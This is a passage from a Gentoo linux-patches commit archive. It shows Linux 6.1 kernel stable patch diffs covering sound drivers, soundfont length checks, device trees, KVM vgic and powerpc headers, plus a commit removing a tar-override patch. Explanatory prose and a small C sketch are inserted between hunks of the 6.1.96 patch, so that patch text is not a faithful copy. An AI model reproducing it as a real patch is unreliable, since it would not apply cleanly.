+--- a/sound/soc/amd/acp/acp-i2s.c
++++ b/sound/soc/amd/acp/acp-i2s.c
+@@ -537,20 +537,12 @@ int asoc_acp_i2s_probe(struct snd_soc_dai *dai)
+ {
+ 	struct device *dev = dai->component->dev;
+ 	struct acp_dev_data *adata = dev_get_drvdata(dev);
+-	struct acp_resource *rsrc = adata->rsrc;
+-	unsigned int val;
+ 
+ 	if (!adata->acp_base) {
+ 		dev_err(dev, "I2S base is NULL\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	val = readl(adata->acp_base + rsrc->i2s_pin_cfg_offset);
+-	if (val != rsrc->i2s_mode) {
+-		dev_err(dev, "I2S Mode not supported val %x\n", val);
+-		return -EINVAL;
+-	}
+-
+ 	return 0;
+ }
+ EXPORT_SYMBOL_NS_GPL(asoc_acp_i2s_probe, SND_SOC_ACP_COMMON);
+diff --git a/sound/soc/fsl/fsl-asoc-card.c b/sound/soc/fsl/fsl-asoc-card.c
+index 8d14b5593658d..8b29099975c91 100644
+--- a/sound/soc/fsl/fsl-asoc-card.c
++++ b/sound/soc/fsl/fsl-asoc-card.c
+@@ -545,6 +545,8 @@ static int fsl_asoc_card_probe(struct platform_device *pdev)
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
++	priv->pdev = pdev;
++
+ 	cpu_np = of_parse_phandle(np, "audio-cpu", 0);
+ 	/* Give a chance to old DT binding */
+ 	if (!cpu_np)
+@@ -754,7 +756,6 @@ static int fsl_asoc_card_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	/* Initialize sound card */
+-	priv->pdev = pdev;
+ 	priv->card.dev = &pdev->dev;
+ 	priv->card.owner = THIS_MODULE;
+ 	ret = snd_soc_of_parse_card_name(&priv->card, "model");
+diff --git a/sound/soc/rockchip/rockchip_i2s_tdm.c b/sound/soc/rockchip/rockchip_i2s_tdm.c
+index 2e36a97077b99..bcea52fa45a50 100644
+--- a/sound/soc/rockchip/rockchip_i2s_tdm.c
++++ b/sound/soc/rockchip/rockchip_i2s_tdm.c
+@@ -651,8 +651,17 @@ static int rockchip_i2s_tdm_hw_params(struct snd_pcm_substream *substream,
+ 	int err;
+ 
+ 	if (i2s_tdm->is_master_mode) {
+-		struct clk *mclk = (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) ?
+-			i2s_tdm->mclk_tx : i2s_tdm->mclk_rx;
++		struct clk *mclk;
++
++		if (i2s_tdm->clk_trcm == TRCM_TX) {
++			mclk = i2s_tdm->mclk_tx;
++		} else if (i2s_tdm->clk_trcm == TRCM_RX) {
++			mclk = i2s_tdm->mclk_rx;
++		} else if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
++			mclk = i2s_tdm->mclk_tx;
++		} else {
++			mclk = i2s_tdm->mclk_rx;
++		}
+ 
+ 		err = clk_set_rate(mclk, DEFAULT_MCLK_FS * params_rate(params));
+ 		if (err)
+diff --git a/sound/synth/emux/soundfont.c b/sound/synth/emux/soundfont.c
+index 16f00097cb95a..eed47e4830248 100644
+--- a/sound/synth/emux/soundfont.c
++++ b/sound/synth/emux/soundfont.c
+@@ -701,7 +701,6 @@ load_data(struct snd_sf_list *sflist, const void __user *data, long count)
+ 	struct snd_soundfont *sf;
+ 	struct soundfont_sample_info sample_info;
+ 	struct snd_sf_sample *sp;
+-	long off;
+ 
+ 	/* patch must be opened */
+ 	sf = sflist->currsf;
+@@ -711,12 +710,16 @@ load_data(struct snd_sf_list *sflist, const void __user *data, long count)
+ 	if (is_special_type(sf->type))
+ 		return -EINVAL;
+ 
++	if (count < (long)sizeof(sample_info)) {
++		return -EINVAL;
++	}
+ 	if (copy_from_user(&sample_info, data, sizeof(sample_info)))
+ 		return -EFAULT;
++	data += sizeof(sample_info);
++	count -= sizeof(sample_info);
+ 
+-	off = sizeof(sample_info);
+-
+-	if (sample_info.size != (count-off)/2)
++	// SoundFont uses S16LE samples.
++	if (sample_info.size * 2 != count)
+ 		return -EINVAL;
+ 
+ 	/* Check for dup */
+@@ -744,7 +747,7 @@ load_data(struct snd_sf_list *sflist, const void __user *data, long count)
+ 		int  rc;
+ 		rc = sflist->callback.sample_new
+ 			(sflist->callback.private_data, sp, sflist->memhdr,
+-			 data + off, count - off);
++			 data, count);
+ 		if (rc < 0) {
+ 			sf_sample_delete(sflist, sf, sp);
+ 			return rc;
+@@ -957,10 +960,12 @@ load_guspatch(struct snd_sf_list *sflist, const char __user *data,
+ 	}
+ 	if (copy_from_user(&patch, data, sizeof(patch)))
+ 		return -EFAULT;
+-	
+ 	count -= sizeof(patch);
+ 	data += sizeof(patch);
+ 
++	if ((patch.len << (patch.mode & WAVE_16_BITS ? 1 : 0)) != count)
++		return -EINVAL;
++
+ 	sf = newsf(sflist, SNDRV_SFNT_PAT_TYPE_GUS|SNDRV_SFNT_PAT_SHARED, NULL);
+ 	if (sf == NULL)
+ 		return -ENOMEM;


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-27 13:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-27 13:10 UTC (permalink / raw
  To: gentoo-commits

commit:     e3597205b8594d58064f7dd6a9e6ccfd4c35f48a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jun 27 13:10:31 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jun 27 13:10:31 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e3597205

Remove redundant patch

Removed:
2930_tar_override.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |  4 ---
 2930_tar_override.patch | 69 -------------------------------------------------
 2 files changed, 73 deletions(-)

diff --git a/0000_README b/0000_README
index 449aa50f..465332b9 100644
--- a/0000_README
+++ b/0000_README
@@ -459,10 +459,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:  2930_tar_override.patch
-From:   https://lore.kernel.org/lkml/20230412082743.350699-1-mgorny@gentoo.org/#t
-Desc:   kheaders: make it possible to override TAR
-
 Patch:  2940_handle-gcc-14-last-stmt-rename.patch
 From:   https://lore.kernel.org/all/20230811060545.never.564-kees@kernel.org/#Z31scripts:gcc-plugins:gcc-common.h
 Desc:   gcc-plugins: Rename last_stmt() for GCC 14+

diff --git a/2930_tar_override.patch b/2930_tar_override.patch
deleted file mode 100644
index aa62aae1..00000000
--- a/2930_tar_override.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From: "Michał Górny" <mgorny@gentoo.org>
-To: Dmitry Goldin <dgoldin+lkml@protonmail.ch>
-Cc: "Masahiro Yamada" <yamada.masahiro@socionext.com>,
-	linux-kernel@vger.kernel.org, "Michał Górny" <mgorny@gentoo.org>,
-	"Sam James" <sam@gentoo.org>,
-	"Masahiro Yamada" <masahiroy@kernel.org>
-Subject: [PATCH v2] kheaders: make it possible to override TAR
-Date: Wed, 12 Apr 2023 10:27:43 +0200	[thread overview]
-Message-ID: <20230412082743.350699-1-mgorny@gentoo.org> (raw)
-In-Reply-To: <CAK7LNATfrxu7BK0ZRq+qSjObiz6GpS3U5L=12vDys5_yy=Mdow@mail.gmail.com>
-
-Commit 86cdd2fdc4e39c388d39c7ba2396d1a9dfd66226 ("kheaders: make headers
-archive reproducible") introduced a number of options specific to GNU
-tar to the `tar` invocation in `gen_kheaders.sh` script.  This causes
-the script to fail to work on systems where `tar` is not GNU tar.  This
-can occur e.g. on recent Gentoo Linux installations that support using
-bsdtar from libarchive instead.
-
-Add a `TAR` make variable to make it possible to override the tar
-executable used, e.g. by specifying:
-
-  make TAR=gtar
-
-Link: https://bugs.gentoo.org/884061
-Reported-by: Sam James <sam@gentoo.org>
-Tested-by: Sam James <sam@gentoo.org>
-Co-developed-by: Masahiro Yamada <masahiroy@kernel.org>
-Signed-off-by: Michał Górny <mgorny@gentoo.org>
----
- Makefile               | 3 ++-
- kernel/gen_kheaders.sh | 2 +-
- 2 files changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/Makefile b/Makefile
-index 5aeea3d98..50045059c 100644
---- a/Makefile
-+++ b/Makefile
-@@ -520,6 +520,7 @@ LZMA		= lzma
- LZ4		= lz4c
- XZ		= xz
- ZSTD		= zstd
-+TAR		= tar
- 
- PAHOLE_FLAGS	= $(shell PAHOLE=$(PAHOLE) $(srctree)/scripts/pahole-flags.sh)
- 
-@@ -599,7 +600,7 @@ export RUSTC RUSTDOC RUSTFMT RUSTC_OR_CLIPPY_QUIET RUSTC_OR_CLIPPY BINDGEN CARGO
- export HOSTRUSTC KBUILD_HOSTRUSTFLAGS
- export CPP AR NM STRIP OBJCOPY OBJDUMP READELF PAHOLE RESOLVE_BTFIDS LEX YACC AWK INSTALLKERNEL
- export PERL PYTHON3 CHECK CHECKFLAGS MAKE UTS_MACHINE HOSTCXX
--export KGZIP KBZIP2 KLZOP LZMA LZ4 XZ ZSTD
-+export KGZIP KBZIP2 KLZOP LZMA LZ4 XZ ZSTD TAR
- export KBUILD_HOSTCXXFLAGS KBUILD_HOSTLDFLAGS KBUILD_HOSTLDLIBS LDFLAGS_MODULE
- export KBUILD_USERCFLAGS KBUILD_USERLDFLAGS
- 
-diff --git a/kernel/gen_kheaders.sh b/kernel/gen_kheaders.sh
-index 1ef9a8751..82d539648 100755
---- a/kernel/gen_kheaders.sh
-+++ b/kernel/gen_kheaders.sh
-@@ -86,7 +86,7 @@ find $cpio_dir -type f -print0 |
- # For compatibility with older versions of tar, files are fed to tar
- # pre-sorted, as --sort=name might not be available.
- find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \
--    tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
-+    ${TAR:-tar} "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
-     --owner=0 --group=0 --numeric-owner --no-recursion \
-     -I $XZ -cf $tarfile -C $cpio_dir/ -T - > /dev/null
- 
--- 
-2.40.0


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-27 12:33 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-27 12:33 UTC (permalink / raw
  To: gentoo-commits

commit:     6135309c0b95a96e9fc95c8917c0ac6c766c8909
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jun 27 12:33:34 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jun 27 12:33:34 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6135309c

Linux patch 6.1.96

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    6 +-
 1095_linux-6.1.96.patch | 4338 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4343 insertions(+), 1 deletion(-)

diff --git a/0000_README b/0000_README
index 34be8944..449aa50f 100644
--- a/0000_README
+++ b/0000_README
@@ -423,12 +423,16 @@ Patch:  1094_linux-6.1.95.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.95
 
+Patch:  1095_linux-6.1.96.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.96
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.
 
 Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
-From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
+From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch
 Desc:   Enable link security restrictions by default.
 
 Patch:  1700_sparc-address-warray-bound-warnings.patch

diff --git a/1095_linux-6.1.96.patch b/1095_linux-6.1.96.patch
new file mode 100644
index 00000000..61aa1cea
--- /dev/null
+++ b/1095_linux-6.1.96.patch
@@ -0,0 +1,4338 @@
+diff --git a/Documentation/devicetree/bindings/i2c/google,cros-ec-i2c-tunnel.yaml b/Documentation/devicetree/bindings/i2c/google,cros-ec-i2c-tunnel.yaml
+index 6e1c70e9275ec..6ab17aa38ecfa 100644
+--- a/Documentation/devicetree/bindings/i2c/google,cros-ec-i2c-tunnel.yaml
++++ b/Documentation/devicetree/bindings/i2c/google,cros-ec-i2c-tunnel.yaml
+@@ -21,7 +21,7 @@ description: |
+   google,cros-ec-spi or google,cros-ec-i2c.
+ 
+ allOf:
+-  - $ref: i2c-controller.yaml#
++  - $ref: /schemas/i2c/i2c-controller.yaml#
+ 
+ properties:
+   compatible:
+diff --git a/Makefile b/Makefile
+index b760de61167dc..83658d447564f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 95
++SUBLEVEL = 96
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+@@ -980,7 +980,6 @@ endif
+ ifdef CONFIG_LTO_CLANG
+ ifdef CONFIG_LTO_CLANG_THIN
+ CC_FLAGS_LTO	:= -flto=thin -fsplit-lto-unit
+-KBUILD_LDFLAGS	+= --thinlto-cache-dir=$(extmod_prefix).thinlto-cache
+ else
+ CC_FLAGS_LTO	:= -flto
+ endif
+@@ -1588,7 +1587,7 @@ endif # CONFIG_MODULES
+ # Directories & files removed with 'make clean'
+ CLEAN_FILES += include/ksym vmlinux.symvers modules-only.symvers \
+ 	       modules.builtin modules.builtin.modinfo modules.nsdeps \
+-	       compile_commands.json .thinlto-cache rust/test rust/doc \
++	       compile_commands.json rust/test rust/doc \
+ 	       .vmlinux.objs .vmlinux.export.c
+ 
+ # Directories & files removed with 'make mrproper'
+@@ -1884,7 +1883,7 @@ PHONY += compile_commands.json
+ 
+ clean-dirs := $(KBUILD_EXTMOD)
+ clean: rm-files := $(KBUILD_EXTMOD)/Module.symvers $(KBUILD_EXTMOD)/modules.nsdeps \
+-	$(KBUILD_EXTMOD)/compile_commands.json $(KBUILD_EXTMOD)/.thinlto-cache
++	$(KBUILD_EXTMOD)/compile_commands.json
+ 
+ PHONY += prepare
+ # now expand this into a simple variable to reduce the cost of shell evaluations
+diff --git a/arch/arm/boot/dts/exynos4210-smdkv310.dts b/arch/arm/boot/dts/exynos4210-smdkv310.dts
+index a5dfd7fd49b39..9de3cb3f3290d 100644
+--- a/arch/arm/boot/dts/exynos4210-smdkv310.dts
++++ b/arch/arm/boot/dts/exynos4210-smdkv310.dts
+@@ -84,7 +84,7 @@ eeprom@52 {
+ &keypad {
+ 	samsung,keypad-num-rows = <2>;
+ 	samsung,keypad-num-columns = <8>;
+-	linux,keypad-no-autorepeat;
++	linux,input-no-autorepeat;
+ 	wakeup-source;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&keypad_rows &keypad_cols>;
+diff --git a/arch/arm/boot/dts/exynos4412-origen.dts b/arch/arm/boot/dts/exynos4412-origen.dts
+index a3905e27b9cd9..473aad848848a 100644
+--- a/arch/arm/boot/dts/exynos4412-origen.dts
++++ b/arch/arm/boot/dts/exynos4412-origen.dts
+@@ -448,7 +448,7 @@ buck9_reg: BUCK9 {
+ &keypad {
+ 	samsung,keypad-num-rows = <3>;
+ 	samsung,keypad-num-columns = <2>;
+-	linux,keypad-no-autorepeat;
++	linux,input-no-autorepeat;
+ 	wakeup-source;
+ 	pinctrl-0 = <&keypad_rows &keypad_cols>;
+ 	pinctrl-names = "default";
+diff --git a/arch/arm/boot/dts/exynos4412-smdk4412.dts b/arch/arm/boot/dts/exynos4412-smdk4412.dts
+index a40ff394977c0..7e0d01498ce3e 100644
+--- a/arch/arm/boot/dts/exynos4412-smdk4412.dts
++++ b/arch/arm/boot/dts/exynos4412-smdk4412.dts
+@@ -65,7 +65,7 @@ cooling_map1: map1 {
+ &keypad {
+ 	samsung,keypad-num-rows = <3>;
+ 	samsung,keypad-num-columns = <8>;
+-	linux,keypad-no-autorepeat;
++	linux,input-no-autorepeat;
+ 	wakeup-source;
+ 	pinctrl-0 = <&keypad_rows &keypad_cols>;
+ 	pinctrl-names = "default";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+index b4aef79650c69..0dd2f79c4f20f 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+@@ -930,7 +930,7 @@ pinctrl_gpio8: gpio8grp {
+ 	/* Verdin GPIO_9_DSI (pulled-up as active-low) */
+ 	pinctrl_gpio_9_dsi: gpio9dsigrp {
+ 		fsl,pins =
+-			<MX8MM_IOMUXC_NAND_RE_B_GPIO3_IO15		0x146>;	/* SODIMM 17 */
++			<MX8MM_IOMUXC_NAND_RE_B_GPIO3_IO15		0x1c6>;	/* SODIMM 17 */
+ 	};
+ 
+ 	/* Verdin GPIO_10_DSI (pulled-up as active-low) */
+diff --git a/arch/arm64/boot/dts/freescale/imx8qm-mek.dts b/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
+index 607cd6b4e9721..470e4e4aa8c78 100644
+--- a/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
++++ b/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
+@@ -32,7 +32,7 @@ reg_usdhc2_vmmc: usdhc2-vmmc {
+ 		regulator-name = "SD1_SPWR";
+ 		regulator-min-microvolt = <3000000>;
+ 		regulator-max-microvolt = <3000000>;
+-		gpio = <&lsio_gpio4 19 GPIO_ACTIVE_HIGH>;
++		gpio = <&lsio_gpio4 7 GPIO_ACTIVE_HIGH>;
+ 		enable-active-high;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts b/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
+index 27f9a9f331346..5a212c05adc67 100644
+--- a/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
+@@ -60,7 +60,6 @@ &usdhc2 {
+ 	vmmc-supply = <&reg_usdhc2_vmmc>;
+ 	bus-width = <4>;
+ 	status = "okay";
+-	no-sdio;
+ 	no-mmc;
+ };
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index 0919e3b8f46ec..39c24e5ea8cd3 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -355,7 +355,7 @@ static void kvm_vgic_dist_destroy(struct kvm *kvm)
+ 
+ 	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
+ 		list_for_each_entry_safe(rdreg, next, &dist->rd_regions, list)
+-			vgic_v3_free_redist_region(rdreg);
++			vgic_v3_free_redist_region(kvm, rdreg);
+ 		INIT_LIST_HEAD(&dist->rd_regions);
+ 	} else {
+ 		dist->vgic_cpu_base = VGIC_ADDR_UNDEF;
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index ae5a3a717655e..48e8b60ff1e33 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -942,8 +942,19 @@ static int vgic_v3_alloc_redist_region(struct kvm *kvm, uint32_t index,
+ 	return ret;
+ }
+ 
+-void vgic_v3_free_redist_region(struct vgic_redist_region *rdreg)
++void vgic_v3_free_redist_region(struct kvm *kvm, struct vgic_redist_region *rdreg)
+ {
++	struct kvm_vcpu *vcpu;
++	unsigned long c;
++
++	lockdep_assert_held(&kvm->arch.config_lock);
++
++	/* Garbage collect the region */
++	kvm_for_each_vcpu(c, vcpu, kvm) {
++		if (vcpu->arch.vgic_cpu.rdreg == rdreg)
++			vcpu->arch.vgic_cpu.rdreg = NULL;
++	}
++
+ 	list_del(&rdreg->list);
+ 	kfree(rdreg);
+ }
+@@ -968,7 +979,7 @@ int vgic_v3_set_redist_base(struct kvm *kvm, u32 index, u64 addr, u32 count)
+ 
+ 		mutex_lock(&kvm->arch.config_lock);
+ 		rdreg = vgic_v3_rdist_region_from_index(kvm, index);
+-		vgic_v3_free_redist_region(rdreg);
++		vgic_v3_free_redist_region(kvm, rdreg);
+ 		mutex_unlock(&kvm->arch.config_lock);
+ 		return ret;
+ 	}
+diff --git a/arch/arm64/kvm/vgic/vgic.h b/arch/arm64/kvm/vgic/vgic.h
+index 9f80a580ca771..5fb0bfc07d856 100644
+--- a/arch/arm64/kvm/vgic/vgic.h
++++ b/arch/arm64/kvm/vgic/vgic.h
+@@ -301,7 +301,7 @@ vgic_v3_rd_region_size(struct kvm *kvm, struct vgic_redist_region *rdreg)
+ 
+ struct vgic_redist_region *vgic_v3_rdist_region_from_index(struct kvm *kvm,
+ 							   u32 index);
+-void vgic_v3_free_redist_region(struct vgic_redist_region *rdreg);
++void vgic_v3_free_redist_region(struct kvm *kvm, struct vgic_redist_region *rdreg);
+ 
+ bool vgic_v3_rdist_overlap(struct kvm *kvm, gpa_t base, size_t size);
+ 
+diff --git a/arch/mips/bmips/setup.c b/arch/mips/bmips/setup.c
+index 549a6392a3d2d..7615f0e30e9de 100644
+--- a/arch/mips/bmips/setup.c
++++ b/arch/mips/bmips/setup.c
+@@ -111,7 +111,8 @@ static void bcm6358_quirks(void)
+ 	 * RAC flush causes kernel panics on BCM6358 when booting from TP1
+ 	 * because the bootloader is not initializing it properly.
+ 	 */
+-	bmips_rac_flush_disable = !!(read_c0_brcm_cmt_local() & (1 << 31));
++	bmips_rac_flush_disable = !!(read_c0_brcm_cmt_local() & (1 << 31)) ||
++				  !!BMIPS_GET_CBR();
+ }
+ 
+ static void bcm6368_quirks(void)
+diff --git a/arch/mips/boot/dts/brcm/bcm63268.dtsi b/arch/mips/boot/dts/brcm/bcm63268.dtsi
+index 8926417a8fbcc..87c75faf4a3b3 100644
+--- a/arch/mips/boot/dts/brcm/bcm63268.dtsi
++++ b/arch/mips/boot/dts/brcm/bcm63268.dtsi
+@@ -109,6 +109,8 @@ timer-mfd@10000080 {
+ 			compatible = "brcm,bcm7038-twd", "simple-mfd", "syscon";
+ 			reg = <0x10000080 0x30>;
+ 			ranges = <0x0 0x10000080 0x30>;
++			#address-cells = <1>;
++			#size-cells = <1>;
+ 
+ 			wdt: watchdog@1c {
+ 				compatible = "brcm,bcm7038-wdt";
+diff --git a/arch/mips/pci/ops-rc32434.c b/arch/mips/pci/ops-rc32434.c
+index 874ed6df97683..34b9323bdabb0 100644
+--- a/arch/mips/pci/ops-rc32434.c
++++ b/arch/mips/pci/ops-rc32434.c
+@@ -112,8 +112,8 @@ static int read_config_dword(struct pci_bus *bus, unsigned int devfn,
+ 	 * gives them time to settle
+ 	 */
+ 	if (where == PCI_VENDOR_ID) {
+-		if (ret == 0xffffffff || ret == 0x00000000 ||
+-		    ret == 0x0000ffff || ret == 0xffff0000) {
++		if (*val == 0xffffffff || *val == 0x00000000 ||
++		    *val == 0x0000ffff || *val == 0xffff0000) {
+ 			if (delay > 4)
+ 				return 0;
+ 			delay *= 2;
+diff --git a/arch/mips/pci/pcie-octeon.c b/arch/mips/pci/pcie-octeon.c
+old mode 100644
+new mode 100755
+index c9edd3fb380df..9eaacd3d33880
+--- a/arch/mips/pci/pcie-octeon.c
++++ b/arch/mips/pci/pcie-octeon.c
+@@ -230,12 +230,18 @@ static inline uint64_t __cvmx_pcie_build_config_addr(int pcie_port, int bus,
+ {
+ 	union cvmx_pcie_address pcie_addr;
+ 	union cvmx_pciercx_cfg006 pciercx_cfg006;
++	union cvmx_pciercx_cfg032 pciercx_cfg032;
+ 
+ 	pciercx_cfg006.u32 =
+ 	    cvmx_pcie_cfgx_read(pcie_port, CVMX_PCIERCX_CFG006(pcie_port));
+ 	if ((bus <= pciercx_cfg006.s.pbnum) && (dev != 0))
+ 		return 0;
+ 
++	pciercx_cfg032.u32 =
++		cvmx_pcie_cfgx_read(pcie_port, CVMX_PCIERCX_CFG032(pcie_port));
++	if ((pciercx_cfg032.s.dlla == 0) || (pciercx_cfg032.s.lt == 1))
++		return 0;
++
+ 	pcie_addr.u64 = 0;
+ 	pcie_addr.config.upper = 2;
+ 	pcie_addr.config.io = 1;
+diff --git a/arch/powerpc/include/asm/hvcall.h b/arch/powerpc/include/asm/hvcall.h
+index 47bc10cdb70b5..a56ec2f124eae 100644
+--- a/arch/powerpc/include/asm/hvcall.h
++++ b/arch/powerpc/include/asm/hvcall.h
+@@ -493,7 +493,7 @@ long plpar_hcall_norets_notrace(unsigned long opcode, ...);
+  * Used for all but the craziest of phyp interfaces (see plpar_hcall9)
+  */
+ #define PLPAR_HCALL_BUFSIZE 4
+-long plpar_hcall(unsigned long opcode, unsigned long *retbuf, ...);
++long plpar_hcall(unsigned long opcode, unsigned long retbuf[static PLPAR_HCALL_BUFSIZE], ...);
+ 
+ /**
+  * plpar_hcall_raw: - Make a hypervisor call without calculating hcall stats
+@@ -507,7 +507,7 @@ long plpar_hcall(unsigned long opcode, unsigned long *retbuf, ...);
+  * plpar_hcall, but plpar_hcall_raw works in real mode and does not
+  * calculate hypervisor call statistics.
+  */
+-long plpar_hcall_raw(unsigned long opcode, unsigned long *retbuf, ...);
++long plpar_hcall_raw(unsigned long opcode, unsigned long retbuf[static PLPAR_HCALL_BUFSIZE], ...);
+ 
+ /**
+  * plpar_hcall9: - Make a pseries hypervisor call with up to 9 return arguments
+@@ -518,8 +518,8 @@ long plpar_hcall_raw(unsigned long opcode, unsigned long *retbuf, ...);
+  * PLPAR_HCALL9_BUFSIZE to size the return argument buffer.
+  */
+ #define PLPAR_HCALL9_BUFSIZE 9
+-long plpar_hcall9(unsigned long opcode, unsigned long *retbuf, ...);
+-long plpar_hcall9_raw(unsigned long opcode, unsigned long *retbuf, ...);
++long plpar_hcall9(unsigned long opcode, unsigned long retbuf[static PLPAR_HCALL9_BUFSIZE], ...);
++long plpar_hcall9_raw(unsigned long opcode, unsigned long retbuf[static PLPAR_HCALL9_BUFSIZE], ...);
+ 
+ /* pseries hcall tracing */
+ extern struct static_key hcall_tracepoint_key;
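
The hvcall.h hunk above switches the return-buffer parameters to the C99 "[static N]" array form, which promises the callee at least N valid elements and lets compilers warn about undersized or NULL arguments at the call site. A minimal sketch with hypothetical names:

#define RETBUF_SIZE 4

long fake_hcall(unsigned long opcode,
		unsigned long retbuf[static RETBUF_SIZE])
{
	(void)opcode;
	for (int i = 0; i < RETBUF_SIZE; i++)
		retbuf[i] = 0;	/* the callee may touch all N slots */
	return 0;
}

/* unsigned long small[2];
 * fake_hcall(0, small);   -- modern GCC/Clang can warn: array too small
 */
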
+diff --git a/arch/powerpc/include/asm/io.h b/arch/powerpc/include/asm/io.h
+index fc112a91d0c2f..0e1745e5125b0 100644
+--- a/arch/powerpc/include/asm/io.h
++++ b/arch/powerpc/include/asm/io.h
+@@ -553,12 +553,12 @@ __do_out_asm(_rec_outl, "stwbrx")
+ #define __do_inw(port)		_rec_inw(port)
+ #define __do_inl(port)		_rec_inl(port)
+ #else /* CONFIG_PPC32 */
+-#define __do_outb(val, port)	writeb(val,(PCI_IO_ADDR)_IO_BASE+port);
+-#define __do_outw(val, port)	writew(val,(PCI_IO_ADDR)_IO_BASE+port);
+-#define __do_outl(val, port)	writel(val,(PCI_IO_ADDR)_IO_BASE+port);
+-#define __do_inb(port)		readb((PCI_IO_ADDR)_IO_BASE + port);
+-#define __do_inw(port)		readw((PCI_IO_ADDR)_IO_BASE + port);
+-#define __do_inl(port)		readl((PCI_IO_ADDR)_IO_BASE + port);
++#define __do_outb(val, port)	writeb(val,(PCI_IO_ADDR)(_IO_BASE+port));
++#define __do_outw(val, port)	writew(val,(PCI_IO_ADDR)(_IO_BASE+port));
++#define __do_outl(val, port)	writel(val,(PCI_IO_ADDR)(_IO_BASE+port));
++#define __do_inb(port)		readb((PCI_IO_ADDR)(_IO_BASE + port));
++#define __do_inw(port)		readw((PCI_IO_ADDR)(_IO_BASE + port));
++#define __do_inl(port)		readl((PCI_IO_ADDR)(_IO_BASE + port));
+ #endif /* !CONFIG_PPC32 */
+ 
+ #ifdef CONFIG_EEH
+@@ -574,12 +574,12 @@ __do_out_asm(_rec_outl, "stwbrx")
+ #define __do_writesw(a, b, n)	_outsw(PCI_FIX_ADDR(a),(b),(n))
+ #define __do_writesl(a, b, n)	_outsl(PCI_FIX_ADDR(a),(b),(n))
+ 
+-#define __do_insb(p, b, n)	readsb((PCI_IO_ADDR)_IO_BASE+(p), (b), (n))
+-#define __do_insw(p, b, n)	readsw((PCI_IO_ADDR)_IO_BASE+(p), (b), (n))
+-#define __do_insl(p, b, n)	readsl((PCI_IO_ADDR)_IO_BASE+(p), (b), (n))
+-#define __do_outsb(p, b, n)	writesb((PCI_IO_ADDR)_IO_BASE+(p),(b),(n))
+-#define __do_outsw(p, b, n)	writesw((PCI_IO_ADDR)_IO_BASE+(p),(b),(n))
+-#define __do_outsl(p, b, n)	writesl((PCI_IO_ADDR)_IO_BASE+(p),(b),(n))
++#define __do_insb(p, b, n)	readsb((PCI_IO_ADDR)(_IO_BASE+(p)), (b), (n))
++#define __do_insw(p, b, n)	readsw((PCI_IO_ADDR)(_IO_BASE+(p)), (b), (n))
++#define __do_insl(p, b, n)	readsl((PCI_IO_ADDR)(_IO_BASE+(p)), (b), (n))
++#define __do_outsb(p, b, n)	writesb((PCI_IO_ADDR)(_IO_BASE+(p)),(b),(n))
